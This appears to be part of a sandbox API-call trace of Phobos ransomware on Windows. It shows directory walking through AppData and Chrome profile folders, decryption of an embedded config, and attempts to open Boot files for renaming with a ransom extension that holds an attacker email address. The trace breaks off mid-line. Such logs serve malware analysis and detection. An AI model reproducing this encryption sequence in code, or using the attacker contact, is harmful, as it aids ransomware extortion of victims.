[0122.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c460 [0122.563] FindClose (in: hFindFile=0x29c460 | out: hFindFile=0x29c460) returned 1 [0122.563] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40800c0 | out: hHeap=0x1db0000) returned 1 [0122.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c4e0 [0122.589] FindClose (in: hFindFile=0x29c4e0 | out: hFindFile=0x29c4e0) returned 1 [0122.589] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40800c0 | out: hHeap=0x1db0000) returned 1 [0122.589] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c4a0 [0122.737] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0122.738] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40800c0 | out: hHeap=0x1db0000) returned 1 [0122.738] FindClose (in: hFindFile=0x29c420 | out: hFindFile=0x29c420) returned 1 [0122.738] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40b00d8 | out: hHeap=0x1db0000) returned 1 [0122.739] FindClose (in: hFindFile=0x29c3e0 | out: hFindFile=0x29c3e0) returned 1 [0122.739] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0122.739] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0122.740] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0122.740] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0122.740] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0122.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c1e0 [0122.740] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0122.740] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40b00d8 | out: hHeap=0x1db0000) returned 1 [0122.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c2a0 [0122.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c3e0 [0122.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c460 [0122.873] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x3a0e7b8 | out: lpFindFileData=0x3a0e7b8) returned 0x29c420 [0122.875] FindClose (in: hFindFile=0x29c420 | out: hFindFile=0x29c420) returned 1 [0122.875] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0122.875] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x3a0e7b8 | out: lpFindFileData=0x3a0e7b8) returned 0x29c420 [0122.877] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c4a0 [0122.877] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0122.877] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40500a8 | out: hHeap=0x1db0000) returned 1 [0122.877] FindClose (in: hFindFile=0x29c420 | out: hFindFile=0x29c420) returned 1 [0122.877] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0122.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x3a0e7b8 | out: lpFindFileData=0x3a0e7b8) returned 0x29c420 [0123.339] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c4a0 [0123.339] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0123.339] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40700b8 | out: hHeap=0x1db0000) returned 1 [0123.339] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c4a0 [0123.343] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0123.343] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40700b8 | out: hHeap=0x1db0000) returned 1 [0123.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c4a0 [0123.387] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0123.387] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40700b8 | out: hHeap=0x1db0000) returned 1 [0123.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c4a0 [0123.465] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0123.465] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40700b8 | out: hHeap=0x1db0000) returned 1 [0123.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c520 [0123.718] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x3a0e2b0 | out: lpFindFileData=0x3a0e2b0) returned 0x29c5e0 [0124.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x3a0e02c | out: lpFindFileData=0x3a0e02c) returned 0x29c4a0 [0124.755] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0124.756] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40e00f0 | out: hHeap=0x1db0000) returned 1 [0124.758] FindClose (in: hFindFile=0x29c5e0 | out: hFindFile=0x29c5e0) returned 1 [0124.758] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40800c0 | out: hHeap=0x1db0000) returned 1 [0124.758] FindClose (in: hFindFile=0x29c520 | out: hFindFile=0x29c520) returned 1 [0124.758] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40700b8 | out: hHeap=0x1db0000) returned 1 [0124.814] FindClose (in: hFindFile=0x29c420 | out: hFindFile=0x29c420) returned 1 [0124.816] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0124.817] FindClose (in: hFindFile=0x29c460 | out: hFindFile=0x29c460) returned 1 [0124.818] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0124.818] FindClose (in: hFindFile=0x29c3e0 | out: hFindFile=0x29c3e0) returned 1 [0124.818] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0124.818] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0124.818] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40b00d8 | out: hHeap=0x1db0000) returned 1 [0124.819] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0124.819] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0124.821] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0124.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0124.821] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0124.821] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0124.822] FindClose (in: hFindFile=0x29c0a0 | out: hFindFile=0x29c0a0) returned 1 [0124.822] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0124.823] FindClose (in: hFindFile=0x29c060 | out: hFindFile=0x29c060) returned 1 [0124.823] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x307bf00 | out: hHeap=0x1db0000) returned 1 [0124.824] SetEvent (hEvent=0x278) returned 1 [0124.824] SetEvent (hEvent=0x274) returned 1 [0124.824] SetEvent (hEvent=0x27c) returned 1 [0124.824] WaitForSingleObject (hHandle=0x27c, dwMilliseconds=0xffffffff) returned 0x0 [0124.824] SetEvent (hEvent=0x278) returned 1 [0124.824] SetEvent (hEvent=0x274) returned 1 [0124.824] SetEvent (hEvent=0x27c) returned 1 [0124.824] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3a0fe58*=0x280, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0124.842] CloseHandle (hObject=0x288) returned 1 [0124.842] CloseHandle (hObject=0x280) returned 1 [0124.842] CloseHandle (hObject=0x274) returned 1 [0124.842] CloseHandle (hObject=0x278) returned 1 [0124.842] CloseHandle (hObject=0x27c) returned 1 [0124.842] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x303bee0 | out: hHeap=0x1db0000) returned 1 [0124.844] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db58b0 | out: hHeap=0x1db0000) returned 1 [0124.844] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5870 | out: hHeap=0x1db0000) returned 1 [0124.844] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016e28 | out: hHeap=0x1db0000) returned 1 [0124.844] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3016e40 | out: hHeap=0x1db0000) returned 1 [0124.845] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9870 | out: hHeap=0x1db0000) returned 1 Thread: id = 103 os_tid = 0x7a8 [0112.485] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x30abf18 [0112.485] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x30cbf28 [0112.485] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x28) returned 0x1db58d0 [0112.485] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x110102) returned 0x4190020 [0112.486] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x50) returned 0x1db9a90 [0112.486] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc80, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fce8 | out: phKey=0x3b6fce8*=0x29c1a0) returned 1 [0112.486] CryptSetKeyParam (hKey=0x29c1a0, dwParam=0x1, pbData=0x3b6fcd0, dwFlags=0x0) returned 1 [0112.486] CryptDecrypt (in: hKey=0x29c1a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9a90, pdwDataLen=0x3b6fc9c | out: pbData=0x1db9a90, pdwDataLen=0x3b6fc9c) returned 1 [0112.486] CryptDestroyKey (hKey=0x29c1a0) returned 1 [0112.486] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0112.486] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0112.486] Wow64DisableWow64FsRedirection (in: OldValue=0x3b6fd34 | out: OldValue=0x3b6fd34*=0x0) returned 1 [0112.486] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9a90 | out: hHeap=0x1db0000) returned 1 [0112.486] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.486] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.486] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.486] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.487] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=0) returned 1 [0112.487] CloseHandle (hObject=0x2a0) returned 1 [0112.487] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.487] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.487] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=0) returned 1 [0112.487] CloseHandle (hObject=0x2a0) returned 1 [0112.487] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.487] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.487] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=89168) returned 1 [0112.487] CloseHandle (hObject=0x2a0) returned 1 [0112.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0112.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.488] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.488] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.488] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.488] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=87616) returned 1 [0112.488] CloseHandle (hObject=0x2a0) returned 1 [0112.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0112.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.488] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.488] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.488] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.489] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=91712) returned 1 [0112.489] CloseHandle (hObject=0x2a0) returned 1 [0112.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0112.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.489] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.489] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.489] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.489] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=94800) returned 1 [0112.489] CloseHandle (hObject=0x2a0) returned 1 [0112.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0112.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.489] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.490] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.490] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.490] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=85056) returned 1 [0112.490] CloseHandle (hObject=0x2a0) returned 1 [0112.490] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0112.490] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.490] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.490] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.490] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.490] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=43600) returned 1 [0112.490] CloseHandle (hObject=0x2a0) returned 1 [0112.490] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0112.490] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.491] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.491] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.491] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.491] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=90192) returned 1 [0112.491] CloseHandle (hObject=0x2a0) returned 1 [0112.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0112.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.491] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.491] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.491] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.491] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=89152) returned 1 [0112.491] CloseHandle (hObject=0x2a0) returned 1 [0112.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0112.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.492] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.492] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.492] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.492] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=3694080) returned 1 [0112.492] CloseHandle 